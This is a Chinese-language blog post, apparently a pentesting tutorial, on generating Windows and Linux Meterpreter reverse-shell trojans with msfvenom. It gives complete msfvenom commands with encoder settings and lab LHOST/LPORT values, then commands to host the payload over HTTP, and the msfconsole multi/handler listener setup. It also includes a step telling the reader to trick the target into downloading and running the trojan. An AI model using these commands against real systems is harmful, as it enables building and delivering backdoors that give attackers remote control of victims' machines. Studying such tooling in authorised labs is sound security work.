Msfvenom 客户端渗透
本文最后更新于 420 天前,其中的信息可能已经有所发展或是发生改变。

Windows 恶意软件

msfvenom 介绍

msfvenom 是 msfpayload 和 msfencode 的结合,可以利用其生成木马程序,在目标机器上执行,在本地监听上线。

msfvenom 使用

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.225.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vip.exe

参数解读:

  • -a:架构
    • x64
    • x86
  • –platform:平台
    • windows
  • -p:payload 及 payload 对应的参数
  • -b:去掉坏字符
  • -e:指定编码器
  • -i:编码次数
  • -f:输出格式
  • -o:输出路径
    service apache2 start # 启动 apache 服务通过 http 访问 /var/www/html 目录来下载文件
    python -m http.server # 启动 python 服务通过 http 访问当前目录

    file

    开启监听,等待目标上线

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.225.128
    set lport 4444
    run

    诱导目标机下载并运行木马

    file

    上线成功(如果是刚测试完持久化后门的,记得回复快照或者删除持久化脚本或者更换端口号,否则可能一开机就直接上线了)
    file

Linux 恶意软件

msfvenom -a x64 --platform linux -p linux/meterpreter/reverse_tcp LHOST=192.168.225.128 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/vip.elf
学海无涯,回头是岸。 --- hola
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇